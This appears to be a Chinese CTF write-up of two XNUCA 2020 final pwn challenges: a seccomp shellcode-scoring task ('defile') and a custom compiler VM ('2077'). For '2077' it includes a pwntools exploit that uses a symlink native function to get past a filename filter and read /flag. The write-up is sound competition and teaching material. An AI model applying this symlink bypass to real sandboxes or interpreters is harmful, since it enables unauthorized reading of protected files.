XNUCA 2020 FINAL defile and 2077

2020-12-10

记录下当时解的两道pwn，defile和2077

defile

这题初赛就有了，而且看了下决赛题目的代码，没有啥变化，只是加了计分的规则，原先是从输入流读取的shellcode，现在变成从文件读取，决赛这题是koh，要求我们交一个文件，里面包含了我们的shellcode，下面就对这道题的代码进行分析，解题见：https://zhangyidong.top/2020/11/04/Xnuca2020%E7%BA%BF%E4%B8%8A%E8%B5%9B/

没有进行很好的优化，如果有兴趣的话可以继续优化下这个shellcode

代码分析

#define _GNU_SOURCE
#include <sched.h>
#include <stdio.h>
#include <stdlib.h>
#include <seccomp.h>
#include <linux/seccomp.h>
#include <sys/mman.h>
#include <sys/wait.h>
#include <unistd.h>
#include <stdint.h>
#include <signal.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <string.h>
#include <errno.h>
#include <sys/prctl.h>
#include <signal.h>

#define MULTI

// #define DEBUG
#define mfence() __asm__ __volatile__("mfence" \
                                      :        \
                                      :        \
                                      : "memory")
#define KEYLENGTH 128

void *shared;
int randfd;

int pipefd[2];

#ifdef MULTI
int cpus;
#endif

void prepare()
{
    // 初始化io
    setvbuf(stdin, 0, 2, 0);
    setvbuf(stdout, 0, 2, 0);
    setvbuf(stderr, 0, 2, 0);
    prctl(PR_SET_PDEATHSIG, SIGKILL);
    pipe(pipefd);	// 调用了pipe开了一个管道
    randfd = open("/dev/urandom", O_RDONLY);
    if (randfd < 0)
    {
#ifdef DEBUG
        printf("RandErr.\n");
#endif
        exit(0);
    }
#ifdef MULTI
    cpus = sysconf(_SC_NPROCESSORS_CONF);	// 获取cpu核数
    printf("cpus: %d\n", cpus);
    if(cpus < 2){
        printf("Need 2 or more cores.\n");
        exit(0);
    }
#endif
    alarm(60);		// 设置60秒超时
}

#ifdef MULTI
void usecpu(int idx){
    cpu_set_t mask;
    CPU_ZERO(&mask);
    CPU_SET(idx, &mask);
    if (sched_setaffinity(0, sizeof(mask), &mask) == -1){	// 设置cpu的亲和性？好像就是充分利用多核
        printf("Set CPU affinity failure, ERROR: %s\n", strerror(errno));
        exit(0);
    }
}
#endif

void do_seccomp()
{
    // 设置seccomp规则，只允许write，close和exit_group系统调用
    scmp_filter_ctx ctx;
    ctx = seccomp_init(SCMP_ACT_KILL);
    seccomp_rule_add(ctx, SCMP_ACT_ALLOW, SCMP_SYS(write), 0);
    seccomp_rule_add(ctx, SCMP_ACT_ALLOW, SCMP_SYS(close), 0);
    seccomp_rule_add(ctx, SCMP_ACT_ALLOW, SCMP_SYS(exit_group), 0);
    if(seccomp_load(ctx) < 0){
        printf("seccompErr.\n");
        exit(0);
    }
}

// 返回一个无符号64位的随机数
uint64_t urand()
{
    uint64_t result;
    int l = read(randfd, &result, 8);
    if (l < 0)
    {
#ifdef DEBUG
        printf("RandErr.\n");
#endif
        exit(0);
    }
    return result;
}

// 读取length个字节到mem里
void readn(int fd, uint8_t *mem, uint64_t length){
    int64_t tmp = 0;
    uint64_t i = 0;
    while(i < length){
        tmp = read(fd, mem + i, length - i);
        if(tmp <= 0){
            printf("readErr.\n");
            exit(-1);
        }
        i += tmp;
    }
}

int getanswer(char *path, char *shared){
    int fd = open(path, O_RDONLY);
    uint64_t length;
    if(fd < 0){
        printf("openErr.\n");
        exit(-1);
    }
    if(read(fd, &length, 8) != 8){
        printf("readlenErr.\n");
        exit(-1);
    }
    if(length > ((4096 - 2) / 2)){
        printf("lengthErr.\n");
        exit(-1);
    }
    if(read(fd, shared, length) != length){
        printf("contentErr.\n");
        exit(-1);
    }
    if(close(fd) < 0){
        printf("closeErr.\n");
        exit(-1);
    }
    memcpy(shared + ((4096 - 2) / 2), shared, length);
    return 2048-length;
}

int main(int argc, char *argv[])
{
    /*
     * argv[1] is the your answer file's path, other arguments are about OJ, don't care about them.
     */
    prepare();	// 初始化

    shared = mmap(NULL, 4096, PROT_READ | PROT_WRITE | PROT_EXEC, MAP_SHARED | MAP_ANONYMOUS, -1, 0);	// 映射匿名内存（0x1000）大小
    memset(shared, 0, 4096);
    int score = getanswer(argv[1], shared);	// 读取我们上传的文件并计算分数，后面有分析
    // This is your score from oj.

    pid_t pid = fork();
    if (pid < 0)	// fork失败
    {
#ifdef DEBUG
        printf("ForkErr.\n");
#endif
        exit(0);
    }
    else if (pid == 0)
    {	
        // 子进程
        // This process is hacker's space
        prctl(PR_SET_PDEATHSIG, SIGKILL);	// 这个设置了的话，执行到非法指令和访问到了非法内存的话程序会被kill掉
        int i = 0;
        pid_t execpid;
        close(pipefd[0]);	// 关闭pipefd[0]，不能从pipefd[0]读了，但是可以向pipefd[1]写（调用write）
        while (1)
        {	// 循环
#ifdef DEBUG
            printf("Fork!%d\n", i);
#endif
            execpid = fork();	// 再次fork
            if (execpid == -1)
            {
#ifdef DEBUG
                printf("ForkErr.\n");
#endif
                exit(0);
            }
            else if (execpid == 0)
            {
                // 子进程里的子进程，也就是孙子进程
                prctl(PR_SET_PDEATHSIG, SIGKILL);
#ifdef MULTI
                usecpu(cpus - 1);	// 使用(cpus-1)编号的cpu
#endif
                do_seccomp();	// 设置seccomp，只允许write，close和exit_group系统调用
                uint64_t targetaddr = (uint64_t)shared + (i % 2) * ((4096 - 2) / 2);	// i%2，意味着targetaddr要么是shared+2047,要么就是shared
                __asm__(
                    "mov $0xdeadbeefdeadbeef, %%rax\n\t"
                    "mov $0xdeadbeefdeadbeef, %%rbx\n\t"
                    "mov $0xdeadbeefdeadbeef, %%rcx\n\t"
                    "mov $0xdeadbeefdeadbeef, %%rdi\n\t"
                    "mov $0xdeadbeefdeadbeef, %%rsi\n\t"
                    "mov $0xdeadbeefdeadbeef, %%r8\n\t"
                    "mov $0xdeadbeefdeadbeef, %%r9\n\t"
                    "mov $0xdeadbeefdeadbeef, %%r10\n\t"
                    "mov $0xdeadbeefdeadbeef, %%r11\n\t"
                    "mov $0xdeadbeefdeadbeef, %%r12\n\t"
                    "mov $0xdeadbeefdeadbeef, %%r13\n\t"
                    "mov $0xdeadbeefdeadbeef, %%r14\n\t"
                    "mov $0xdeadbeefdeadbeef, %%r15\n\t"
                    "jmp *%%rdx\n\t"
                    :
                    :"d"(targetaddr)
                    :
                );
                exit(0);
            }
            else
            {
                waitpid(execpid, NULL, 0);	// 等待孙子进程退出
            }
            i++;
        }
    }
    else
    {
        // 父进程
        // This process is handler.
        char key[KEYLENGTH];
        int i = 0;
        uint64_t offset;
        read(randfd, key, KEYLENGTH);	// 读取128字节长的key
        close(pipefd[1]);		// 关闭pipefd[1]，不能向pipefd[1]里写，但是能向pipefd[0]里读（调用read）
#ifdef MULTI
        usecpu(0);	// 使用0号cpu
#endif
        for (i = 0; i < KEYLENGTH; i++)		// 128轮循环
        {
            printf("Round:\t%d\n", i);
            offset = urand() % (4096 - 2 - 8);
            offset &= 0xfffffffffffffff8;	// 每轮的offset都是随机的，但是小于4086且以8字节对齐

#ifdef DEBUG
            printf("Key:\t%hu\n", (uint8_t)key[i]);
            printf("Change:\t%d\n", offset);
            uint64_t *saved = (uint64_t *)((char *)shared + offset);
            mfence();
            printf("Before:\t%llx\n", *saved);
            mfence();
            printf("------------\n");
#endif
            *((uint8_t *)shared + 4094) = 0;	// 向shared+4094处写入一个0字节
            while (1)	
            {
                if (*((char *)shared + 4095) == key[i])	// 不断的check（shared+4095)处是不是被写入了key[i]
                {
                    mfence();	
                    *(uint64_t *)((char *)shared + offset) = 0xcccccccccccccccc;	// 如果被写入了key[i],就把offset处的shellcode全部改成0xcccccccccccccccc,即破坏选手的shellcode
                    break;
                }
            }
            mfence();
            while (*((uint8_t *)shared + 4094) != 1)	// 不断的check（shared+4094)处是不是被写入了1
                ;
            mfence();
#ifdef DEBUG
            printf("After:\t%llx\n", *saved);
            printf("------------\n\n\n");
#endif
            mfence();	
            // 1轮循环结束
        }
        // 完成128轮循环
        char answer[KEYLENGTH];
        memset(answer, 0, KEYLENGTH);
        read(pipefd[0], answer, KEYLENGTH);				// 向pipefd[0]里读取128字节到answer
        if (memcmp(key, answer, KEYLENGTH) == 0)		// 比较answer和key，如果正确就成功，即题交分数，原来初赛是直接给flag
        {
            printf("SUCCEED\n");
            submit(score, &argv[2]);
        }
        else								// 失败
        {
            printf("FAIL\n");
        }
        exit(0);
    }

    return 0;
}

题目是怎么算分数的：

int getanswer(char *path, char *shared){
    int fd = open(path, O_RDONLY);		// 打开我们交上去的文件
    uint64_t length;
    if(fd < 0){
        printf("openErr.\n");
        exit(-1);
    }
    if(read(fd, &length, 8) != 8){		// 文件的前8个字节是shellcode的长度
        printf("readlenErr.\n");
        exit(-1);
    }
    if(length > ((4096 - 2) / 2)){		// 长度不能大于2047，因为程序mmap出来的大小也就只有0x1000（4096）大小
        printf("lengthErr.\n");
        exit(-1);
    }
    if(read(fd, shared, length) != length){	// 读取shellcode到shared开始的位置
        printf("contentErr.\n");
        exit(-1);
    }
    if(close(fd) < 0){
        printf("closeErr.\n");
        exit(-1);
    }
    memcpy(shared + ((4096 - 2) / 2), shared, length);	// 复制shellcode到shared+2047的位置
    return 2048-length;			// 这里就是计算分数的地方了，意思就是我们的shellcode长度越短，分数越高
}

这题计算分数就是很简单，你的shellcode越短，分数就越高，前提是你的shellcode能完成那128轮的循环

2077

这题比较有意思，出题人自己写了一个compiler，读取->解析->运行我们的代码

代码分析

先看下目录树：

.
├── compiler
│   ├── create.c
│   ├── error.c
│   ├── error_message.c
│   ├── error_message_not_gcc.c
│   ├── fix_tree.c
│   ├── generate.c
│   ├── interface.c
│   ├── main.c
│   ├── Makefile
│   ├── protoc.h
│   ├── proto.l
│   ├── proto.y
│   ├── string.c
│   ├── test
│   │   └── run.proto
│   ├── util.c
│   ├── wchar.c
│   └── y.output
├── debug
│   ├── dbg.o
│   ├── debug.c
│   ├── debug.h
│   ├── debug.o
│   └── Makefile
├── include
│   ├── DBG.h
│   ├── MEM.h
│   ├── PRT.h
│   ├── PVM_code.h
│   ├── PVM_dev.h
│   ├── PVM.h
│   └── share.h
├── memory
│   ├── main.c
│   ├── Makefile
│   ├── mem.o
│   ├── memory.c
│   ├── memory.h
│   ├── memory.o
│   ├── storage.c
│   └── storage.o
├── pvm
│   ├── error.c
│   ├── error_message.c
│   ├── error_message_not_gcc.c
│   ├── execute.c
│   ├── heap.c
│   ├── Makefile
│   ├── native.c
│   ├── nativeif.c
│   ├── pvm_pri.h
│   ├── util.c
│   └── wchar.c
├── share
│   ├── disassemble.c
│   ├── disassemble.o
│   ├── dispose.c
│   ├── dispose.o
│   ├── Makefile
│   ├── opcode.c
│   ├── opcode.o
│   ├── share.o
│   ├── wchar.c
│   └── wchar.o
└── test

8 directories, 58 files

用ida打开压缩包里的pwn程序，能定位到main函数应该是compiler的main.c，程序一开始会叫我们输入代码的size，接着读取我们输入的代码，然后解析执行就结束了，所以我们要找到编译器里对代码进行解析的漏洞，比如没有对数组的下标进行check，或者类型转换检查不严格之类的漏洞。

漏洞

写在最前面，编译器要求调用函数前我们一定要声明该函数的原型，用afl++来插桩，fuzz失败了。。所以下面漏洞都是直接读源码找的

readfile

比赛的时候没过多久就被人打了，tr3e学长看了下源码，发现有后门函数，这是编译器内置的函数：

// pvm/native.c
void
pvm_add_native_functions(PVM_VirtualMachine *pvm)
{
    PVM_add_native_function(pvm, "print", nv_print_proc, 1);
    PVM_add_native_function(pvm, "readfile", nv_readfile_proc, 1);
    PVM_add_native_function(pvm, "max", nv_max_proc, 2);
    PVM_add_native_function(pvm, "hex", nv_hex_proc, 1);
    PVM_add_native_function(pvm, "unhex", nv_unhex_proc, 1);
    PVM_add_native_function(pvm, "lnk", nv_lnk_proc, 2);
    PVM_add_native_function(pvm, "d2u", nv_d2u_proc, 1);
}

可以看见有一个readfile的函数还有print，这个readfile是可以打开文件的：

static PVM_Value
nv_readfile_proc(PVM_VirtualMachine *pvm,
              int arg_count, PVM_Value *args){

    PVM_Value ret;
    ret.object = malloc(sizeof(PVM_Object));
    ret.object->u.string.string = NULL_STRING;
    PVM_Char *str;
    char *result = malloc(2048);
    PVM_Char *wresult = malloc(4096);
    char *fname = malloc(256);
    memset(result, 0, 2048);
    memset(wresult, 0, 4096);
    memset(fname, 0, 256);

    DBG_assert(arg_count == 1, ("arg_count..%d", arg_count));
    if(args[0].object == NULL){
        str = NULL_STRING;
    } else{
        str = args[0].object->u.string.string;
        pvm_wcstombs(str, fname);
    }

    if(wcsstr(str, L"flag") != NULL){		// 但是不能直接打开包含flag字样的文件路径
        printf("no way \n");
        return ret;
    }

    FILE* fp = fopen(fname, "r");
    if(fp != NULL){
        fread(result, 1024, 1, fp);
        fclose(fp);
        pvm_mbstowcs(result, wresult);
        ret.object->u.string.string = wresult;
    }
    return ret;
}

可以看到有一个check，但是这个check可以用lnk函数来绕过：

static PVM_Value
nv_lnk_proc(PVM_VirtualMachine *pvm,
              int arg_count, PVM_Value *args){

    PVM_Value ret;
    ret.int_value = 0;
    DBG_assert(arg_count == 2, ("arg_count..%d", arg_count));
    PVM_Char *src = NULL;
    PVM_Char *dst = NULL;
    char* source = NULL;
    char* dest = NULL;
    if(args[0].object == NULL){
        src = NULL_STRING;
    } else{
        src = args[0].object->u.string.string;
    }
    if(args[1].object == NULL){
        dst = NULL_STRING;
    }else{
        dst = args[1].object->u.string.string;
    }
    if(dst && src){
        source = malloc(256);
        dest = malloc(256);
        memset(source, 0, 256);
        memset(dest, 0, 256);
        pvm_wcstombs(src, source);
        pvm_wcstombs(dst, dest);
        if(wcsstr(dst, L"flag") != NULL){
            printf("no way \n");
            return ret;
        }
        int result = symlink(source, dest);
        ret.int_value = result;
        return ret; 
    }else{
        ret.int_value = -1;
        return ret;
    }
}

lnk函数也有对包含flag字样的路径进行check，但是细看一下，它检查的是dst字符串中是否包含flag字样，而不是src字符串里是否包含flag，所以着检查没啥用，第一版exp：

from pwn import *

context.arch='amd64'
context.log_level='debug'

def debug(addr,PIE=True):
	if PIE:
		text_base = int(os.popen("pmap {}| awk '{{print $1}}'".format(p.pid)).readlines()[1], 16)
		gdb.attach(p,'b *{}'.format(hex(text_base+addr)))
	else:
		gdb.attach(p,"b *{}".format(hex(addr)))

def main(host,port=16957):
	global p
	if host:
		p=remote(host,port)
	else:
		p=process("./pwn")
		# gdb.attach(p)
		debug(0x00000000000739D)
	code = """string readfile(string name);
string lnk(string src, string dest);
string print(string x);
lnk("/flag", "/tmp/y");
print(readfile("/tmp/y"));"""
	
	p.recvuntil("size: ")
	p.sendline(str(len(code)+2))
	p.recvuntil("Give me your script(same size): ")
	p.sendline(code)
	p.interactive()

if __name__ == '__main__':
	# libc=ELF("/lib/x86_64-linux-gnu/libc.so.6")
	# main("123.57.209.176")
	
	main(args["REMOTE"])

本来是lnk到当前目录下的，但是当前目录没有写权限，最后发现/tmp目录有写权限，所以就lnk到/tmp目录了

个人觉得这种题目，编译器解析的语言，我们可以类比c语言，java，java script这些语言定义变量，定义函数，调用函数的语法来试编译器解析的语言的语法，当然源码中也给出了语法（compiler/proto.y）：

%{
#include <stdio.h>
#include "protoc.h"
#define YYDEBUG 1
%}
%union {
    char                *identifier;
    ParameterList       *parameter_list;
    ArgumentList        *argument_list;
    Expression          *expression;
    ExpressionList      *expression_list;
    Statement           *statement;
    StatementList       *statement_list;
    Block               *block;
    Elsif               *elsif;
    AssignmentOperator  assignment_operator;
    TypeSpecifier       *type_specifier;
    PVM_BasicType       basic_type_specifier;
    ArrayDimension      *array_dimension;
}
%token <expression>     INT_LITERAL
%token <expression>     DOUBLE_LITERAL
%token <expression>     STRING_LITERAL
%token <expression>     REGEXP_LITERAL
%token <identifier>     IDENTIFIER
%token IF ELSE ELSIF WHILE FOR FOREACH RETURN_T BREAK CONTINUE NULL_T
        LP RP LC RC LB RB SEMICOLON COLON COMMA ASSIGN_T LOGICAL_AND LOGICAL_OR
        EQ NE GT GE LT LE ADD SUB MUL DIV MOD TRUE_T FALSE_T EXCLAMATION DOT
        ADD_ASSIGN_T SUB_ASSIGN_T MUL_ASSIGN_T DIV_ASSIGN_T MOD_ASSIGN_T
        INCREMENT DECREMENT TRY CATCH FINALLY THROW
        BOOLEAN_T INT_T DOUBLE_T STRING_T NEW
%type   <parameter_list> parameter_list
%type   <argument_list> argument_list
%type   <expression> expression expression_opt
        assignment_expression logical_and_expression logical_or_expression
        equality_expression relational_expression
        additive_expression multiplicative_expression
        unary_expression primary_expression primary_no_new_array
        array_literal array_creation
%type   <expression_list> expression_list
%type   <statement> statement
        if_statement while_statement for_statement foreach_statement
        return_statement break_statement continue_statement try_statement
        throw_statement declaration_statement
%type   <statement_list> statement_list
%type   <block> block
%type   <elsif> elsif elsif_list
%type   <assignment_operator> assignment_operator
%type   <identifier> identifier_opt label_opt
%type   <type_specifier> type_specifier
%type   <basic_type_specifier> basic_type_specifier
%type   <array_dimension> dimension_expression dimension_expression_list
        dimension_list
%%
translation_unit
        : definition_or_statement
        | translation_unit definition_or_statement
        ;
definition_or_statement
        : function_definition
        | statement
        {
            PRT_Compiler *compiler = prt_get_current_compiler();

            compiler->statement_list
                = prt_chain_statement_list(compiler->statement_list, $1);
        }
        ;
basic_type_specifier
        : BOOLEAN_T
        {
            $$ = PVM_BOOLEAN_TYPE;
        }
        | INT_T
        {
            $$ = PVM_INT_TYPE;
        }
        | DOUBLE_T
        {
            $$ = PVM_DOUBLE_TYPE;
        }
        | STRING_T
        {
            $$ = PVM_STRING_TYPE;
        }
        ;
type_specifier
        : basic_type_specifier
        {
            $$ = prt_create_type_specifier($1);
        }
        | type_specifier LB RB
        {
            $$ = prt_create_array_type_specifier($1);
        }
        ;
function_definition
        : type_specifier IDENTIFIER LP parameter_list RP block
        {
            prt_function_define($1, $2, $4, $6);
        }
        | type_specifier IDENTIFIER LP RP block
        {
            prt_function_define($1, $2, NULL, $5);
        }
        | type_specifier IDENTIFIER LP parameter_list RP SEMICOLON
        {
            prt_function_define($1, $2, $4, NULL);
        }
        | type_specifier IDENTIFIER LP RP SEMICOLON
        {
            prt_function_define($1, $2, NULL, NULL);
        }
        ;
parameter_list
        : type_specifier IDENTIFIER
        {
            $$ = prt_create_parameter($1, $2);
        }
        | parameter_list COMMA type_specifier IDENTIFIER
        {
            $$ = prt_chain_parameter($1, $3, $4);
        }
        ;
argument_list
        : assignment_expression
        {
            $$ = prt_create_argument_list($1);
        }
        | argument_list COMMA assignment_expression
        {
            $$ = prt_chain_argument_list($1, $3);
        }
        ;
statement_list
        : statement
        {
            $$ = prt_create_statement_list($1);
        }
        | statement_list statement
        {
            $$ = prt_chain_statement_list($1, $2);
        }
        ;
expression
        : assignment_expression
        | expression COMMA assignment_expression
        {
            $$ = prt_create_comma_expression($1, $3);
        }
        ;
assignment_expression
        : logical_or_expression
        | primary_expression assignment_operator assignment_expression
        {
            $$ = prt_create_assign_expression($1, $2, $3);
        }
        ;
assignment_operator
        : ASSIGN_T
        {
            $$ = NORMAL_ASSIGN;
        }
        | ADD_ASSIGN_T
        {
            $$ = ADD_ASSIGN;
        }
        | SUB_ASSIGN_T
        {
            $$ = SUB_ASSIGN;
        }
        | MUL_ASSIGN_T
        {
            $$ = MUL_ASSIGN;
        }
        | DIV_ASSIGN_T
        {
            $$ = DIV_ASSIGN;
        }
        | MOD_ASSIGN_T
        {
            $$ = MOD_ASSIGN;
        }
        ;
logical_or_expression
        : logical_and_expression
        | logical_or_expression LOGICAL_OR logical_and_expression
        {
            $$ = prt_create_binary_expression(LOGICAL_OR_EXPRESSION, $1, $3);
        }
        ;
logical_and_expression
        : equality_expression
        | logical_and_expression LOGICAL_AND equality_expression
        {
            $$ = prt_create_binary_expression(LOGICAL_AND_EXPRESSION, $1, $3);
        }
        ;
equality_expression
        : relational_expression
        | equality_expression EQ relational_expression
        {
            $$ = prt_create_binary_expression(EQ_EXPRESSION, $1, $3);
        }
        | equality_expression NE relational_expression
        {
            $$ = prt_create_binary_expression(NE_EXPRESSION, $1, $3);
        }
        ;
relational_expression
        : additive_expression
        | relational_expression GT additive_expression
        {
            $$ = prt_create_binary_expression(GT_EXPRESSION, $1, $3);
        }
        | relational_expression GE additive_expression
        {
            $$ = prt_create_binary_expression(GE_EXPRESSION, $1, $3);
        }
        | relational_expression LT additive_expression
        {
            $$ = prt_create_binary_expression(LT_EXPRESSION, $1, $3);
        }
        | relational_expression LE additive_expression
        {
            $$ = prt_create_binary_expression(LE_EXPRESSION, $1, $3);
        }
        ;
additive_expression
        : multiplicative_expression
        | additive_expression ADD multiplicative_expression
        {
            $$ = prt_create_binary_expression(ADD_EXPRESSION, $1, $3);
        }
        | additive_expression SUB multiplicative_expression
        {
            $$ = prt_create_binary_expression(SUB_EXPRESSION, $1, $3);
        }
        ;
multiplicative_expression
        : unary_expression
        | multiplicative_expression MUL unary_expression
        {
            $$ = prt_create_binary_expression(MUL_EXPRESSION, $1, $3);
        }
        | multiplicative_expression DIV unary_expression
        {
            $$ = prt_create_binary_expression(DIV_EXPRESSION, $1, $3);
        }
        | multiplicative_expression MOD unary_expression
        {
            $$ = prt_create_binary_expression(MOD_EXPRESSION, $1, $3);
        }
        ;
unary_expression
        : primary_expression
        | SUB unary_expression
        {
            $$ = prt_create_minus_expression($2);
        }
        | EXCLAMATION unary_expression
        {
            $$ = prt_create_logical_not_expression($2);
        }
        ;
primary_expression
        : primary_no_new_array
        | array_creation
        ;
primary_no_new_array
        : primary_no_new_array LB expression RB
        {
            $$ = prt_create_index_expression($1, $3);
        }
        | primary_expression DOT IDENTIFIER
        {
            $$ = prt_create_member_expression($1, $3);
        }
        | primary_expression LP argument_list RP
        {
            $$ = prt_create_function_call_expression($1, $3);
        }
        | primary_expression LP RP
        {
            $$ = prt_create_function_call_expression($1, NULL);
        }
        | primary_expression INCREMENT
        {
            $$ = prt_create_incdec_expression($1, INCREMENT_EXPRESSION);
        }
        | primary_expression DECREMENT
        {
            $$ = prt_create_incdec_expression($1, DECREMENT_EXPRESSION);
        }
        | LP expression RP
        {
            $$ = $2;
        }
        | IDENTIFIER
        {
            $$ = prt_create_identifier_expression($1);
        }
        | INT_LITERAL
        | DOUBLE_LITERAL
        | STRING_LITERAL
        | REGEXP_LITERAL
        | TRUE_T
        {
            $$ = prt_create_boolean_expression(PVM_TRUE);
        }
        | FALSE_T
        {
            $$ = prt_create_boolean_expression(PVM_FALSE);
        }
        | NULL_T
        {
            $$ = prt_create_null_expression();
        }
        | array_literal
        ;
array_literal
        : LC expression_list RC
        {
            $$ = prt_create_array_literal_expression($2);
        }
        | LC expression_list COMMA RC
        {
            $$ = prt_create_array_literal_expression($2);
        }
        ;
array_creation
        : NEW basic_type_specifier dimension_expression_list
        {
            $$ = prt_create_array_creation($2, $3, NULL);
        }
        | NEW basic_type_specifier dimension_expression_list dimension_list
        {
            $$ = prt_create_array_creation($2, $3, $4);
        }
        ;
dimension_expression_list
        : dimension_expression
        | dimension_expression_list dimension_expression
        {
            $$ = prt_chain_array_dimension($1, $2);
        }
        ;
dimension_expression
        : LB expression RB
        {
            $$ = prt_create_array_dimension($2);
        }
        ;
dimension_list
        : LB RB
        {
            $$ = prt_create_array_dimension(NULL);
        }
        | dimension_list LB RB
        {
            $$ = prt_chain_array_dimension($1,
                                           prt_create_array_dimension(NULL));
        }
        ;
expression_list
        : /* empty */
        {
            $$ = NULL;
        }
        | assignment_expression
        {
            $$ = prt_create_expression_list($1);
        }
        | expression_list COMMA assignment_expression
        {
            $$ = prt_chain_expression_list($1, $3);
        }
        ;
statement
        : expression SEMICOLON
        {
          $$ = prt_create_expression_statement($1);
        }
        | if_statement
        | while_statement
        | for_statement
        | foreach_statement
        | return_statement
        | break_statement
        | continue_statement
        | try_statement
        | throw_statement
        | declaration_statement
        ;
if_statement
        : IF LP expression RP block
        {
            $$ = prt_create_if_statement($3, $5, NULL, NULL);
        }
        | IF LP expression RP block ELSE block
        {
            $$ = prt_create_if_statement($3, $5, NULL, $7);
        }
        | IF LP expression RP block elsif_list
        {
            $$ = prt_create_if_statement($3, $5, $6, NULL);
        }
        | IF LP expression RP block elsif_list ELSE block
        {
            $$ = prt_create_if_statement($3, $5, $6, $8);
        }
        ;
elsif_list
        : elsif
        | elsif_list elsif
        {
            $$ = prt_chain_elsif_list($1, $2);
        }
        ;
elsif
        : ELSIF LP expression RP block
        {
            $$ = prt_create_elsif($3, $5);
        }
        ;
label_opt
        : /* empty */
        {
            $$ = NULL;
        }
        | IDENTIFIER COLON
        {
            $$ = $1;
        }
        ;
while_statement
        : label_opt WHILE LP expression RP block
        {
            $$ = prt_create_while_statement($1, $4, $6);
        }
        ;
for_statement
        : label_opt FOR LP expression_opt SEMICOLON expression_opt SEMICOLON
          expression_opt RP block
        {
            $$ = prt_create_for_statement($1, $4, $6, $8, $10);
        }
        ;
foreach_statement
        : label_opt FOREACH LP IDENTIFIER COLON expression RP block
        {
            $$ = prt_create_foreach_statement($1, $4, $6, $8);
        }
        ;
expression_opt
        : /* empty */
        {
            $$ = NULL;
        }
        | expression
        ;
return_statement
        : RETURN_T expression_opt SEMICOLON
        {
            $$ = prt_create_return_statement($2);
        }
        ;
identifier_opt
        : /* empty */
        {
            $$ = NULL;
        }
        | IDENTIFIER
        ;
break_statement 
        : BREAK identifier_opt SEMICOLON
        {
            $$ = prt_create_break_statement($2);
        }
        ;
continue_statement
        : CONTINUE identifier_opt SEMICOLON
        {
            $$ = prt_create_continue_statement($2);
        }
        ;
try_statement
        : TRY block CATCH LP IDENTIFIER RP block FINALLY block
        {
            $$ = prt_create_try_statement($2, $5, $7, $9);
        }
        | TRY block FINALLY block
        {
            $$ = prt_create_try_statement($2, NULL, NULL, $4);
        }
        | TRY block CATCH LP IDENTIFIER RP block
        {
            $$ = prt_create_try_statement($2, $5, $7, NULL);
        }
throw_statement
        : THROW expression SEMICOLON
        {
            $$ = prt_create_throw_statement($2);
        }
declaration_statement
        : type_specifier IDENTIFIER SEMICOLON
        {
            $$ = prt_create_declaration_statement($1, $2, NULL);
        }
        | type_specifier IDENTIFIER ASSIGN_T expression SEMICOLON
        {
            $$ = prt_create_declaration_statement($1, $2, $4);
        }
        ;
block
        : LC
        {
            $<block>$ = prt_open_block();
        }
          statement_list RC
        {
            $<block>$ = prt_close_block($<block>2, $3);
        }
        | LC RC
        {
            Block *empty_block = prt_open_block();
            $<block>$ = prt_close_block(empty_block, NULL);
        }
        ;
%%

这文件是应该是yacc lex解析的文件，当时只是粗略的看了下，大部分还都是瞎试出来的，:P

proto.l文件给的内容也很详细，是具体解析词法的正则表达式形式：

%{
#undef YY_INPUT
#define YY_INPUT(buf, result, max_size) (result = my_yyinput(buf, max_size))
#include <stdio.h>
#include <string.h>
#include "DBG.h"
#include "protoc.h"
#include "y.tab.h"

static int
file_input(char *buf, int max_size)
{
    int ch;
    int len;

    if (feof(yyin))
        return 0;

    for (len = 0; len < max_size; len++) {
        ch = getc(yyin);
        if (ch == EOF)
            break;
        buf[len] = ch;
    }
    return len;
}

static char **st_source_string;
static int st_current_source_line;
static int st_current_char_index;
 
void
prt_set_source_string(char **source)
{
    st_source_string = source;
    st_current_source_line = 0;
    st_current_char_index = 0;
}

static int
string_input(char *buf, int max_size)
{
    int len;

    if (st_source_string[st_current_source_line] == NULL)
        return 0;

    if (st_source_string[st_current_source_line][st_current_char_index]
        == '\0') {
        st_current_source_line++;
        st_current_char_index = 0;
    }

    if (st_source_string[st_current_source_line] == NULL)
        return 0;

    len = smaller(strlen(st_source_string[st_current_source_line])
                  - st_current_char_index,
                  max_size);
    strncpy(buf,
            &st_source_string[st_current_source_line][st_current_char_index],
            len);
    st_current_char_index += len;

    return len;
}

static int
my_yyinput(char *buf, int max_size)
{
    int result;

    switch (prt_get_current_compiler()->input_mode) {
    case PRT_FILE_INPUT_MODE:
        result = file_input(buf, max_size);
        break;
    case PRT_STRING_INPUT_MODE:
        result = string_input(buf, max_size);
        break;
    default:
        DBG_panic(("bad default. input_mode..%d\n",
                   prt_get_current_compiler()->input_mode));
    }

    return result;
}


int
yywrap(void)
{
    return 1;
}

static void
increment_line_number(void)
{
    prt_get_current_compiler()->current_line_number++;
}
%}
%start C_COMMENT CC_COMMENT STRING_LITERAL_STATE SHIFT_JIS_2ND_CHAR
%%
<INITIAL>"if"           return IF;
<INITIAL>"else"         return ELSE;
<INITIAL>"elsif"        return ELSIF;
<INITIAL>"while"        return WHILE;
<INITIAL>"for"          return FOR;
<INITIAL>"foreach"      return FOREACH;
<INITIAL>"return"       return RETURN_T;
<INITIAL>"break"        return BREAK;
<INITIAL>"continue"     return CONTINUE;
<INITIAL>"null"         return NULL_T;
<INITIAL>"true"         return TRUE_T;
<INITIAL>"false"        return FALSE_T;
<INITIAL>"try"          return TRY;
<INITIAL>"catch"        return CATCH;
<INITIAL>"finally"      return FINALLY;
<INITIAL>"throw"        return THROW;
<INITIAL>"boolean"      return BOOLEAN_T;
<INITIAL>"int"          return INT_T;
<INITIAL>"double"       return DOUBLE_T;
<INITIAL>"string"       return STRING_T;
<INITIAL>"new"          return NEW;
<INITIAL>"("            return LP;
<INITIAL>")"            return RP;
<INITIAL>"{"            return LC;
<INITIAL>"}"            return RC;
<INITIAL>"["            return LB;
<INITIAL>"]"            return RB;
<INITIAL>";"            return SEMICOLON;
<INITIAL>":"            return COLON;
<INITIAL>","            return COMMA;
<INITIAL>"&&"           return LOGICAL_AND;
<INITIAL>"||"           return LOGICAL_OR;
<INITIAL>"="            return ASSIGN_T;
<INITIAL>"=="           return EQ;
<INITIAL>"!="           return NE;
<INITIAL>">"            return GT;
<INITIAL>">="           return GE;
<INITIAL>"<"            return LT;
<INITIAL>"<="           return LE;
<INITIAL>"+"            return ADD;
<INITIAL>"-"            return SUB;
<INITIAL>"*"            return MUL;
<INITIAL>"/"            return DIV;
<INITIAL>"%"            return MOD;
